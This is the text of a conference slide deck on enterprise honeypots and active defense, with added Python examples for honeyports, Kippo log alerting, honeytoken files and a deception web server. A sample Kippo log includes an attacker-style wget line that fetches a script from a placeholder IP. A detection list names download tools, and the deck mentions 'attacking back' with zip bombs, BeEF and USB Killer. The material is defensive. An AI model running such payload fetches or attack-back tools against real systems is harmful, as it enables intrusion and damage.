Honeypots for Active Defense
A Practical Guide to Honeynets within the Enterprise
Greg Foss
SecOps Lead / Senior Researcher
@heinzarelli
# whoami
Greg Foss
SecOps Team Lead
Sr. Security Research Engineer
OSCP, GAWN, GPEN, GWAPT, GCIH, CEH, CYBER APT
Traditional Defensive Concepts
• Maintain a tough perimeter
• Implement layered security controls
• Block known attacks and ban malicious IP’s
• Create and enforce policy to discourage misuse
…cross our fingers
InfoSec Realities
• There is no magic security product that
will protect you or your company. Period.
• It’s when, not if — there’s always a way in…
Not Just ‘APTs’
Active Defense
What is ‘Active Defense’
• All comes down to tipping the odds in our
favor as defenders…
• Annoying the attacker
• Trapping them and wasting time
• Gather data + attempt attribution
• ‘Attacking Back’
• Reduce the MTTD and MTTR
• MTTD => Mean-Time-to-Detect
• MTTR => Mean-Time-to-Respond
Why Internal Honeypots?
• Easy to configure, deploy, and maintain
• Fly traps for anomalous activity
• They don’t even need to look legit once
breached… Just enough to raise a flag.
• You will learn a ton about your adversaries.
Information that will help in the future…
• *Honeypots are something to focus on after
the basics have been taken care of.
Honeypot Use Cases
• Research
• Understand how attackers think, what
works, what doesn’t, and what they are
after.
• Defense
• Learn from the adversary and adapt…
Lay traps to catch subtle yet abnormal
activities.
Defense
VM’s
ADHD (Active Defense Harbinger Distribution)
http://sourceforge.net/projects/adhd/
HoneyDrive 3
http://sourceforge.net/projects/honeydrive/
First things first…
• Honeypots and Active Defense come after
baseline security controls are in place.
• Warning banners are critical and assist in the
event prosecution is necessary / desired.
Types of Honeypots
No Interaction
Low Interaction
Medium Interaction
High Interaction
Honey Tokens / Drives / Strings / Etc.
*note - this is my interpretation, not necessarily ‘industry standard’
No Interaction Honeypots
Primarily referred to as Honeyports, or services
that simply log and/or ban on full TCP connect.
‘No Interaction’ Honeypots
• Basic Honeyports
• Linux - NetCat and IPTables
• Windows - NetCat and Netsh
• Python and PowerShell options as well…
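A honeyport in Python, added here as a worked example of the Linux / Python option in the list above (it is not Artillery and not a script from this deck). It writes one JSON line per completed TCP connect and bans the source with an iptables DROP rule; the allowlist ranges, the port, the log path and the DRY_RUN default are this example's own choices. Only an accepted connection counts, so a half-open SYN scan (nmap -sS) never trips it, while a connect scan (nmap -sT) or any real client does.

```python
"""Minimal Linux honeyport: log every completed TCP connect, then ban the source.

Added example; not Artillery or any script from the original deck. A real ban
needs root and iptables; with DRY_RUN the command is only returned, so the
decision logic can be exercised on any host.
"""
import ipaddress
import json
import socket
import subprocess
import time

# Never ban these: monitoring hosts, vulnerability scanners, yourself.
# The ranges below are constructed for this example.
ALLOWLIST = [ipaddress.ip_network("10.0.0.0/24"),
             ipaddress.ip_network("127.0.0.0/8")]
DRY_RUN = True  # set False on the honeypot host to really call iptables


def is_allowlisted(peer_ip):
    addr = ipaddress.ip_address(peer_ip)
    return any(addr in net for net in ALLOWLIST)


def ban_command(peer_ip):
    """iptables argv that drops all further traffic from peer_ip (top of INPUT)."""
    return ["iptables", "-I", "INPUT", "1", "-s", peer_ip, "-j", "DROP"]


def decide(peer_ip, port, banned):
    """Build the log event for one completed connect and update the ban set.

    action is 'allowlisted' (log only), 'ban' (first hit from this source) or
    'already_banned' (a repeat that raced the firewall rule).
    """
    if is_allowlisted(peer_ip):
        action = "allowlisted"
    elif peer_ip in banned:
        action = "already_banned"
    else:
        banned.add(peer_ip)
        action = "ban"
    return {"ts": time.time(), "src": peer_ip, "honeyport": port, "action": action}


def apply_ban(event, dry_run=DRY_RUN):
    """Run the ban for a 'ban' event; always return the argv for the audit trail."""
    cmd = ban_command(event["src"])
    if event["action"] == "ban" and not dry_run:
        subprocess.run(cmd, check=False)
    return cmd


def serve(bind="0.0.0.0", port=2222, log_path="honeyport.log"):
    """Accept forever. No banner is sent: nothing to fingerprint, nothing to exploit."""
    banned = set()
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind, port))
    srv.listen(16)
    while True:
        conn, (peer_ip, _) = srv.accept()   # only a full three-way handshake gets here
        conn.close()
        event = decide(peer_ip, port, banned)
        with open(log_path, "a") as fh:     # one JSON line per hit; ship it with a syslog/SIEM agent
            fh.write(json.dumps(event) + "\n")
        apply_ban(event)


if __name__ == "__main__":
    serve()
```

Pick a port that looks worth poking at on an internal host but is not served there (binding below 1024 needs root). The ban set lives in the process while the iptables rule persists until flushed, so after a restart the script may log an "already banned" source as a fresh ban; that is harmless but worth knowing when you correlate.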
Windows PowerShell
Honeyports
Linux Honeyports
• Artillery — supports Windows too!
• https://www.trustedsec.com/downloads/artillery/
Artillery Logging
• Port Scanning and/or Illegitimate Service Access
• Local Syslog, Flat File, or Remote Syslog options
• IP’s are added to the banlist and blocked locally
via IPTables
Artillery Logging Bonus!
• File Integrity Monitoring
Low Interaction Honeypots
Honeypots that serve up basic content
and are not interactive once breached.
WordPot
• https://github.com/gbrindisi/wordpot
• Fake WordPress app, written in Python…
Fake PhpMyAdmin
• https://github.com/gfoss/phpmyadmin_honeypot
• Simple fake phpmyadmin ‘app’ that logs to flat files.
This same approach can be applied to anything…
$any fake login panel
• Custom - but believable and hidden from normal
users
• Can be used in ‘reverse phishing’ — discussing
later…
$any fake login panel
• Logging attacker data is standard, what if you
need evidence that is a bit more tangible…
Honeybadger
• https://bitbucket.org/LaNMaSteR53/honeybadger/
• Gain *true attribution on your adversaries…
Medium Interaction Honeypots
Interactive honeypots that resemble real services
and provide limited functionality once breached.
Medium Interaction Honeypots
• TONS! But one of my favorites:
• https://github.com/desaster/kippo
• https://github.com/gfoss/kippo
• Simulate SSH Service…
Kippo
• Python script which simulates an SSH service that is
highly customizable, portable, and adaptable.
• Logs to flat files and stores the full TTY session
for each connection, so that attacks can be replayed
in real-time.
• One of the more popular honeypots out there; as a result, attackers know how
to differentiate between it and a real Linux host very quickly (the default
banner, hostname and fake filesystem are well known). Be cautious, and change
the defaults. Kippo itself is no longer maintained; Cowrie is the actively
developed fork.
• When deploying externally, there is a risk of C2 servers (botnet controllers)
maintaining persistent connections to the honeypot.
• Can be used as a pentest tool as well :-)
Kippo Alert Automation
https://github.com/gfoss/kippo/blob/master/replay-alert.sh
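The alerting logic behind a replay-alert script, as an added example (it is not Kippo's own code and not the replay-alert.sh linked above). The log lines are constructed to resemble Kippo's kippo.log layout (timestamp, bracketed context, message) and are not real captures; the replay hint assumes Kippo's utils/playlog.py is available on the honeypot. A failed brute force on an internal honeypot is logged but not paged; a successful login is, and staging commands raise the severity.

```python
"""Kippo-style log lines -> per-session summary -> alerts worth paging on.

Added example; not Kippo's own code and not the replay-alert.sh script.
SAMPLE is constructed to resemble kippo.log and is not a real capture.
"""
import re
from collections import defaultdict

SAMPLE = """\
2015-05-10 14:02:11+0000 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 198.51.100.23:51522 (10.1.1.5:2222) [session: 7]
2015-05-10 14:02:13+0000 [SSHService ssh-userauth on HoneyPotTransport,7,198.51.100.23] login attempt [root/123456] failed
2015-05-10 14:02:15+0000 [SSHService ssh-userauth on HoneyPotTransport,7,198.51.100.23] login attempt [root/toor] succeeded
2015-05-10 14:02:20+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,198.51.100.23] CMD: uname -a
2015-05-10 14:02:25+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,198.51.100.23] CMD: wget http://203.0.113.9/x.sh -O /tmp/x.sh
2015-05-10 14:02:40+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,198.51.100.23] Closing TTY log: log/tty/20150510-140215-7.log
2015-05-10 14:05:01+0000 [SSHService ssh-userauth on HoneyPotTransport,8,198.51.100.77] login attempt [admin/admin] failed
"""

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) \[(?P<ctx>[^\]]*)\] (?P<msg>.*)$")
TRANSPORT_RE = re.compile(r"HoneyPotTransport,(?P<sid>\d+),(?P<ip>[\d.]+)")
NEWCONN_RE = re.compile(r"New connection: (?P<ip>[\d.]+):\d+ .*\[session: (?P<sid>\d+)\]")
LOGIN_RE = re.compile(r"login attempt \[(?P<user>[^/\]]*)/(?P<pw>[^\]]*)\] (?P<result>succeeded|failed)")
CMD_RE = re.compile(r"^CMD: (?P<cmd>.*)$")
TTY_RE = re.compile(r"Closing TTY log: (?P<path>\S+)")

# Substrings that usually mean a payload is being staged; tune per environment.
STAGING = ("wget ", "curl ", "chmod +x", "tftp ", "/tmp/")


def parse_line(line):
    """One log line -> event dict (type: connect/login/cmd/tty/other) or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = {"ts": m.group("ts"), "sid": None, "ip": None, "type": "other", "msg": m.group("msg")}
    t = TRANSPORT_RE.search(m.group("ctx"))
    if t:
        ev["sid"], ev["ip"] = t.group("sid"), t.group("ip")
    msg = ev["msg"]
    n = NEWCONN_RE.search(msg)
    if n:
        ev.update(type="connect", sid=n.group("sid"), ip=n.group("ip"))
        return ev
    lg = LOGIN_RE.search(msg)
    if lg:
        ev.update(type="login", user=lg.group("user"), password=lg.group("pw"),
                  ok=lg.group("result") == "succeeded")
        return ev
    c = CMD_RE.match(msg)
    if c:
        ev.update(type="cmd", cmd=c.group("cmd"))
        return ev
    y = TTY_RE.search(msg)
    if y:
        ev.update(type="tty", path=y.group("path"))
    return ev


def summarize(lines):
    """Group events by Kippo session id."""
    sessions = defaultdict(lambda: {"ip": None, "logins": [], "commands": [], "tty": None, "success": False})
    for line in lines:
        ev = parse_line(line)
        if not ev or ev["sid"] is None:
            continue
        s = sessions[ev["sid"]]
        s["ip"] = s["ip"] or ev["ip"]
        if ev["type"] == "login":
            s["logins"].append((ev["user"], ev["password"], ev["ok"]))
            s["success"] = s["success"] or ev["ok"]
        elif ev["type"] == "cmd":
            s["commands"].append(ev["cmd"])
        elif ev["type"] == "tty":
            s["tty"] = ev["path"]
    return dict(sessions)


def alerts(sessions):
    """Page only on sessions that got a shell; staging commands make it critical."""
    out = []
    for sid, s in sessions.items():
        if not s["success"]:
            continue  # failed guesses are noise internally: keep the log, skip the page
        staging = [c for c in s["commands"] if any(k in c for k in STAGING)]
        out.append({
            "session": sid, "src": s["ip"],
            "severity": "critical" if staging else "high",
            "creds": [(u, p) for u, p, ok in s["logins"] if ok],
            "commands": s["commands"],
            # assumption: Kippo's utils/playlog.py is present for TTY replay
            "replay": "python utils/playlog.py %s" % s["tty"] if s["tty"] else None,
        })
    return out


if __name__ == "__main__":
    for a in alerts(summarize(SAMPLE.splitlines())):
        print(a)
```

Feed the real kippo.log through summarize() from a tail -F loop or a cron job and hand the alert dicts to whatever pages you (syslog, a webhook, a SIEM rule). The working credentials and the command list are the intelligence: the password that "worked" on the honeypot is one the attacker believes is valid somewhere in your environment.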
High Interaction Honeypots
Imitate real systems or modify real hosts to act as
honeypots in order to verbosely log attacker activity
and capture all network and related flow data.
Analysis Tools
• LogRhythm Network Monitor and SIEM
• Suricata IDS
• http://suricata-ids.org/download/
• Bro IDS (now Zeek)
• https://www.bro.org/
• Cuckoo Sandbox
• http://www.cuckoosandbox.org/
Routers and Switches
• ROMAN Hunter - Router Man Hunter
• http://sourceforge.net/projects/romanhunter/
• Configure real AP as a honeypot
• Capture MAC of attacker that bypasses security
• Correlate the MAC and add it to an organizational blacklist…
High Interaction Warning!
• Deploying real systems / devices / services is
dangerous and requires dedicated monitoring.
• Whenever hosts can actually be compromised
there is huge risk if not monitored
appropriately.
• Never use the organization’s gold-standard
image for the honeypot.
• Segment these hosts from the production
network!
Honey Tokens and Document Bugging
Tracking file access, modification, exfiltration, etc…
File Integrity Monitoring
Honey Tokens
• Use file integrity monitoring to track all
interactions with files/folders/etc of interest.
Great for network shares.
• Not just files, this can be strings, drives,
directories, etc.
• Any predefined item that will generate a log when accessed/modified/etc.
• Trivial to configure…
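File-based honey tokens with a baseline-and-rescan integrity check, as an added example (not from the deck and not a FIM product). It seeds decoy files into a directory (a network share in practice), records a baseline, and on rescan reports modification, deletion and unexpected new files. Reads are caught through atime only where the mount updates it, which is the caveat with any access detection that does not come from the file server's own audit log; the decoy names and contents are constructed.

```python
"""Honeytoken files with a baseline-and-rescan integrity check.

Added example; not from the deck or any FIM product. Decoy names and contents
are constructed. Reads are detected through atime only where the filesystem
updates it; modification, deletion and new files are detected regardless.
"""
import hashlib
import json
import os

DECOYS = {
    "passwords_backup_2014.xlsx": b"PK\x03\x04 decoy spreadsheet",
    "VPN_credentials.txt": b"host: vpn.corp.example\nuser: svc_backup\npass: (decoy)\n",
}


def sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def seed(root):
    """Drop the decoys into a share/directory nobody has a legitimate reason to touch."""
    os.makedirs(root, exist_ok=True)
    for name, body in DECOYS.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)


def snapshot(root):
    snap = {}
    for name in sorted(os.listdir(root)):
        path = os.path.join(root, name)
        if not os.path.isfile(path):
            continue
        st = os.stat(path)           # capture atime BEFORE our own read
        digest = sha256(path)
        # put the timestamps back so the scanner's read does not look like an access
        os.utime(path, ns=(st.st_atime_ns, st.st_mtime_ns))
        snap[name] = {"sha256": digest, "size": st.st_size,
                      "mtime_ns": st.st_mtime_ns, "atime_ns": st.st_atime_ns}
    return snap


def save_baseline(root, baseline_path):
    with open(baseline_path, "w") as fh:
        json.dump(snapshot(root), fh)


def diff(baseline, current):
    """Compare two snapshots; an empty list means nobody touched the decoys."""
    events = []
    for name, old in baseline.items():
        new = current.get(name)
        if new is None:
            events.append({"file": name, "event": "deleted"})
        elif new["sha256"] != old["sha256"] or new["mtime_ns"] != old["mtime_ns"]:
            events.append({"file": name, "event": "modified"})
        elif new["atime_ns"] > old["atime_ns"]:
            # needs a mount that updates atime (no noatime); with relatime only a
            # read after a write, or one more than a day later, moves the timestamp
            events.append({"file": name, "event": "accessed"})
    for name in sorted(current.keys() - baseline.keys()):
        events.append({"file": name, "event": "new_file"})
    return events


def rescan(root, baseline_path):
    with open(baseline_path) as fh:
        baseline = json.load(fh)
    return diff(baseline, snapshot(root))
```

Run rescan() from cron on the file server and forward the events. For reliable read detection use the platform audit facility instead of atime: an auditd watch such as `auditctl -w /srv/share/decoys -p rwa -k honeytoken` on Linux, or an object-access SACL on the share on Windows, tells you who opened the file, which a timestamp never can.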
Document Bugging
• WebBug How To:
• http://ha.ckers.org/webbug.html

• WebBug Server:
• https://bitbucket.org/ethanr/webbugserver

• Bugged Files - Is your Document Telling on You?
• Daniel Crowley + Damon Smith
• https://www.youtube.com/watch?v=co1gFikKLpA
Document Tracking
• Same tricks used by Marketing for years,
normally for tracking emails.
• Why loading external images within email is risky…
Document Tracking
• Documents can be tracked in the same way as email /
web.
• Automating the process…
• https://github.com/gfoss/misc/tree/master/Bash/webbug
Document Tracking Issues
• If the document is opened up offline it will
divulge information about the tracking service.
• *There is no telling how someone will react
once it is discovered that they were being
tracked…
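One small deception web server covering two passages at once: the custom fake login panel from the low-interaction section and the document beacon described here. It is an added example, not the phpmyadmin_honeypot, the WebBug Server or the webbug script linked above; the paths, the token format, the JSON log format and the in-memory registry are this example's own choices. The beacon id is opaque and random, so a document opened offline reveals the tracking host but not which file was bugged or who received it.

```python
"""One small deception HTTP server: fake admin login panel + document beacon.

Added example; not the phpmyadmin_honeypot, WebBug Server or webbug script
linked in the deck. Paths, token format, log format and the in-memory
REGISTRY are this example's own choices (persist it in practice).
"""
import json
import secrets
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

LOG_PATH = "deception.jsonl"
REGISTRY = {}   # beacon id -> document label; the id itself says nothing
GIF_1x1 = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!\xf9\x04"
           b"\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
LOGIN_PAGE = (b"<html><body><h2>Administration</h2><form method=post>"
              b"User <input name=user><br>Password <input type=password name=pass><br>"
              b"<input type=submit value=Login></form></body></html>")


def beacon_url(base, doc_label):
    """Register a per-copy id and return the image URL to embed in that document."""
    bid = secrets.token_hex(16)            # 128 random bits: unguessable, unlinkable
    REGISTRY[bid] = doc_label
    return "%s/img/%s.gif" % (base, bid)


def parse_login(body):
    form = parse_qs(body, keep_blank_values=True)
    return {"user": form.get("user", [""])[0], "password": form.get("pass", [""])[0]}


def make_event(kind, peer, headers, **extra):
    ev = {"ts": time.time(), "event": kind, "src": peer,
          "ua": headers.get("User-Agent", ""), "xff": headers.get("X-Forwarded-For", "")}
    ev.update(extra)
    return ev


def route(method, path, peer, headers, body=""):
    """Pure dispatch: (status, content-type, payload, event-or-None). Easy to test."""
    p = urlparse(path).path
    if method == "GET" and p.startswith("/img/") and p.endswith(".gif"):
        bid = p[len("/img/"):-len(".gif")]
        label = REGISTRY.get(bid)
        if label is None:   # guessed or stale id: still worth knowing about
            return 404, "text/plain", b"not found", make_event("beacon_unknown", peer, headers, beacon=bid)
        return 200, "image/gif", GIF_1x1, make_event("document_opened", peer, headers, document=label)
    if p == "/admin/":       # never linked from anywhere a normal user would browse
        if method == "POST":
            creds = parse_login(body)
            # always "fail": the attacker keeps trying and every guess gets logged
            return 200, "text/html", LOGIN_PAGE, make_event("login_attempt", peer, headers, **creds)
        return 200, "text/html", LOGIN_PAGE, make_event("panel_view", peer, headers)
    return 404, "text/plain", b"not found", None


class Handler(BaseHTTPRequestHandler):
    def _serve(self, method):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode("utf-8", "replace") if length else ""
        status, ctype, payload, ev = route(method, self.path, self.client_address[0], self.headers, body)
        if ev:
            with open(LOG_PATH, "a") as fh:   # one JSON line per hit for the SIEM
                fh.write(json.dumps(ev) + "\n")
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Cache-Control", "no-store")   # each open must reach the server
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)

    def do_GET(self):
        self._serve("GET")

    def do_POST(self):
        self._serve("POST")

    def log_message(self, *args):   # the JSON log replaces stderr noise
        pass


if __name__ == "__main__":
    print("embed this in the decoy document:", beacon_url("http://bug.corp.example:8080", "q3-forecast.docx"))
    HTTPServer(("0.0.0.0", 8080), Handler).serve_forever()
```

Generate one beacon URL per copy you hand out so the log tells you which copy was opened, and keep REGISTRY on disk so a restart does not turn real opens into beacon_unknown events. The X-Forwarded-For field only means something behind a proxy you control; from anywhere else it is attacker-supplied text.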
Screwing with Attackers
• Reverse Phishing and ‘Attacking Back’
• A case study…
More Tricks
• Zip Bombs
• http://unforgettable.dk - 42.zip
• BeEF - Browser Exploitation Framework
• http://beefproject.com/
• USB Killer
• http://kukuruku.co/hub/diy/usb-killer
• Clippy!
• http://www.irongeek.com/i.php?page=security/phpids-install-notes
cat /dev/random | nc -nl 22
• Feeds random bytes to anything that connects to port 22. Binding port 22 needs
root and a host whose real sshd lives elsewhere; traditional netcat wants
-l -p 22 rather than a bare port; on older kernels /dev/random can block
once the entropy pool drains, so /dev/urandom keeps the stream flowing.
ASCII Art Distraction
• https://github.com/nitram509/ascii-telnet-server
Monitoring
• Dedicated SOC - Security Operations Center
• SIEM - Security Information Event Management
• Correlate and Track Events
• Evaluate Impact on the Real Environment
• Measure Risk and Actively Respond to
Threats
• IDS, Network Flow Analysis, Firewalls, etc.
• Configure once and it’s smooth sailing from there…
Enterprise Threat Intelligence
• Develop Context-Aware Threat Intelligence
• Leverage knowledge gained from attackers to
create IOC’s and custom IDS and SIEM rules…
Event Correlation
Automating Response
• Dynamic Honeypotting
• Deploy PowerShell and Command Line Logging
• http://www.slideshare.net/Hackerhurricane/ask-aalware-archaeologist/25
Automating Response
• Google Rapid Response - GRR
• https://github.com/google/grr
• Netflix FIDO
• https://github.com/Netflix/Fido
• Kansa
• https://github.com/davehull/Kansa
• Power Forensics
• https://github.com/Invoke-IR/PowerForensics
PSRecon
• 1 PowerShell script
• Live data acquisition and incident response
• Integrates into existing security processes
• Remote forensic acquisition
• Host and user lockdown
• https://github.com/gfoss/PSRecon/
Bringing it all together…
Honeypot Dashboards
• HoneyDrive 3 comes complete with dashboards and enhancement scripts to
display interesting data.
• Kippo Graph
• http://bruteforce.gr/kippo-graph
• The Modern Honey Network - can also deploy and manage the sensors!
• https://threatstream.com/blog/mhn-modern-honey-network
• LogRhythm SIEM - Honeypot Analytics Suite
Works Cited & Recommended Reading
• Strand, John, and Asadoorian, Paul. Offensive
Countermeasures: The Art of Active Defense. 2013.
• Murdoch, D. W. Blue Team Handbook: Incident
Response Edition: A Condensed Field Guide for
the Cyber Security Incident Responder. United
States: CreateSpace Independent, 2014.
• Chuvakin, Anton, and Kevin Schmidt. Logging and
Log Management: The Authoritative Guide to
Dealing with Syslog, Audit Logs, Events, Alerts and
Other IT 'noise' Rockland, MA: Syngress, 2012.
• Bodmer, Sean, Max Kilger, Gregory Carpenter, and Jade Jones. Reverse
Deception: Organized Cyber Threat Counter-Exploitation. New York:
McGraw-Hill, 2012.
Thank You!
Questions?
https://github.com/gfoss/
Greg Foss
OSCP, GAWN, GPEN, GWAPT, GCIH, CEH
SecOps Lead / Sr. Researcher
greg.foss[at]LogRhythm.com
@heinzarelli